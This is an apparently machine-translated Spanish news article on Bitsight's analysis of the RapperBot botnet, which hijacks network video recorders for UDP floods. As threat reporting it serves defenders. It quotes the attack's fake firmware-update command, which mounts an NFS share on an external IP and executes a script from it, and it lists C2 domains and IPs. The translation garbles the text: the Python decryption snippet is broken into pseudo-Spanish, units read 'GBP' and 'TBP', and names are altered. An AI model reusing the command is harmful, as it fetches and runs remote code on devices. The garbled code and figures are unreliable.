Los investigadores de ciberseguridad comenzaron a detectar un aumento alarmante a principios de abril de 2025 en el tráfico de inundaciones de UDP que emana de las grabadoras de video de la red comprometida (NVRS) y otros dispositivos Edge.
Dentro de los milisegundos de la infección, estos dispositivos fueron armados para dirigir volúmenes abrumadores de paquetes en objetivos desprevenidos, lo que lleva a interrupciones del servicio y consumo masivo de ancho de banda.
Los analistas de Bitsight identificaron esta actividad como el trabajo de una nueva botnet que denominaron Rapperbot, señalando su cadena de matar inusualmente rápida y el uso innovador de restricciones de hardware heredadas para evadir la detección.
Configuración de Ethernet Hub de 18 puertos (Fuente-Bitsight)
La emergencia del malware sigue un patrón familiar: los actores de amenaza escanean Internet en busca de interfaces web expuestas, fuerza bruta o credenciales predeterminados de explotación y entregan una carga útil maliciosa disfrazada de actualización de firmware.
Una vez ejecutado, RapperBot comienza inmediatamente dos acciones distintas: consultas de registro DNS TXT cifradas para obtener direcciones IP de comando y control (C2) e inundaciones UDP continuas en el puerto 80.
Las evaluaciones de impacto muestran el rendimiento individual del dispositivo que excede los 1 GBP, con una capacidad de botnet agregada en más de 7 TBP durante las campañas coordinadas contra los principales objetivos, incluidos los proveedores de búsqueda basados en la nube y las plataformas de redes sociales.
A pesar de su potencia, el comportamiento del malware es elegantemente simple: monta una parte remota de NFS para obtener y ejecutar binarios específicos de la arquitectura, luego auto-decelados para funcionar completamente en la memoria.
Investigadores de Bitsight anotado Esta estrategia aprovecha el entorno mínimo de BusyBox en muchos dispositivos IoT, donde las herramientas de descarga estándar como Curl o /Dev /TCP están ausentes.
Al explotar el mecanismo de actualización de firmware del NVR, específicamente, un día cero transversal de ruta en el servidor web seguido de una recuperación binaria sobre NFS, RapperBot evita los artefactos habituales del sistema de archivos que desencadenan alertas antivirus.
Actualización de firmware La carga útil JSON (Fuente – Bitsight)
Bajo el capó, el mecanismo de descubrimiento C2 de Rapperbot se basa en registros TXT cifrados alojados en dominios abiertos como Iranistrash.libre y Pool.rentcheapcars.sbs.
El malware construye uno de los 32 nombres de host predeterminados seleccionando al azar desde el subdominio codificado, el dominio y las listas de TLD, luego resuelve estos nombres contra servidores DNS personalizados (1.1.1.1, 8.8.8.8 y otros).
La respuesta TXT contiene una lista separada por tuberías de direcciones IP cifradas, que el bot con un algoritmo personalizado tipo RC4 seguido de decodificación base-56.
Un fragmento de pitón que ilustra las etapas de descifrado aparece a continuación:-
# Etapa 1: Algoritmo de programación de clave (KSA -Like) S = List (Range (56)) Key = (First_Byte_index + Second_Byte_index * 56) para i en Range (55, 0, -1): Key = (0x41C64E6D * Key + 0x3039) y 0xfffffffff J = KEY) S (J), S (i) # Etapa 2: XOR basado en tecla Decryption KeyStream = byteArray () i = j = 0 para b en cifrado_payload (2: 2: i = (i + 1) % 56 j = (j + s (i)) % 56 S (i), s (j) = s (j), s (i) keysream. Append(S((S(i) + S(j)) % 56) ^ b) # Stage 3: Base-56 decoding to obtain plaintext IP list plaintext = base56_decode(keystream) print(plaintext) # eg, b”194.226.121.51|188.92.28.62|…” Getting C2 IP addess and connecting to C2 (Source – Bitsight)
Mecanismo de infección
El vector de infección de RapperBot capitaliza el puerto administrativo (TCP 34567) de NVR vulnerables.
Al identificar un dispositivo expuesto, el atacante explota una falla de transversal de ruta para descargar archivos de configuración de la cuenta, revelando las credenciales de hash y el texto sin formato.
Con estas credenciales, el atacante inicia una actualización falsa de firmware, enviando una carga útil con cremallera sobre el protocolo de actualización patentada.
El archivo ZIP contiene un sencillo InstallDesc JSON que instruye al dispositivo a montar 104.194.9.127:/nfs y ejecutar el script de carga útil:-
{“UpdateCommand”: ({“Comando”: “Shell”, “Script”: “CD/Var; Mount -o Intr, Nolock, Exec 104.194.9.127:/nfs Z; Z/Z;”})}
Este enfoque omite hábilmente las limitaciones de la caja de la NVR (no WGet, Curl, o / dev / TCP) al usar NFS, un protocolo universalmente compatible incluso en sistemas Linux incrustados mínimos.
El script itera a través de múltiples binarios de arquitectura de ARM hasta que tiene éxito, escribe un archivo marcador .r, luego limpia, sin dejar ejecutable en disco.
La ejecución inmediata de la memoria montada reduce significativamente la huella forense y permite la transición dividida del dispositivo benigno al participante activo de DDoS.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
